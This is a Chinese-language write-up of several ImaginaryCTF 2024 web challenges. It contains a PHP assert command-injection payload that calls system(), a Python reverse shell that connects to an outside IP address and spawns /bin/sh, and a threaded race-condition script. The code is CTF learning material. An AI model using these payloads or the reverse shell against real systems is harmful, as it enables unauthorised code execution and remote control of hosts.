【Web】ImaginaryCTF 2024 部分题解

目录

journal

crystals

P2C

readme

The Amazing Race

journal

简单的assert命令拼接

payload:

?file=test','..') === true || system("echo `tac /flag-cARdaInFg6dD10uWQQgm.txt`") || strpos('test

crystals

docker-compose.yml里

让服务报错读到泄露的hostname

payload:

/{0x401}

P2C

后端直接运行我们提供的代码

直接反弹shell

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("124.222.136.33",1337))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

readme

题目设计不能读目录下的已有文件

用非断空格绕过

The Amazing Race

先输入left,right

再输入up,down

脚本里direction1是竞争获取canmove，direction2是目标方向

import requests
import threading
import re
import time

# 设置服务器URL
url = "http://the-amazing-race.chal.imaginaryctf.org"
move_url = url + "/move"

found = threading.Event()

# 设置迷宫大小
MAZE_SIZE = 35

def move(maze_id, direction):
    response = requests.post(move_url, params={"id": maze_id, "move": direction})
    time.sleep(0.1)
    return response

def break_wall(maze_id, direction1, direction2):
    attempt = 0
    while not found.is_set():
        threads = []
        threads.append(threading.Thread(target=move, args=(maze_id, direction1)))
        threads.append(threading.Thread(target=move, args=(maze_id, direction2)))
        threads.append(threading.Thread(target=move, args=(maze_id, direction2)))
        threads.append(threading.Thread(target=move, args=(maze_id, direction2)))
        threads.append(threading.Thread(target=move, args=(maze_id, direction2)))
        threads.append(threading.Thread(target=move, args=(maze_id, direction2)))
        threads.append(threading.Thread(target=move, args=(maze_id, direction2)))

        for thread in threads:
            thread.start()
        
        for thread in threads:
            thread.join()

        attempt += 1
        print(f"Attempt {attempt}", flush=True)

def get_maze(maze_id):
    try:
        response = requests.get(f"{url}/{maze_id}")
        if response.status_code == 200:
            maze_match = re.search(r"<code>(.*?)</code>", response.text, re.DOTALL)
            if maze_match:
                return maze_match.group(1)
    except Exception as e:
        print(f"Error in get_maze: {e}", flush=True)
    return ""

if __name__ == "__main__":
    maze_id = input("Enter maze_id: ").strip()
    direction1 = input("Enter first direction (left or up): ").strip()
    direction2 = input("Enter second direction (right or down): ").strip()
    if direction1 in ["left", "up"] and direction2 in ["right", "down"]:
        break_wall(maze_id, direction1, direction2)
    else:
        print("Invalid direction. Please enter 'left' or 'up' for the first direction, and 'right' or 'down' for the second direction.")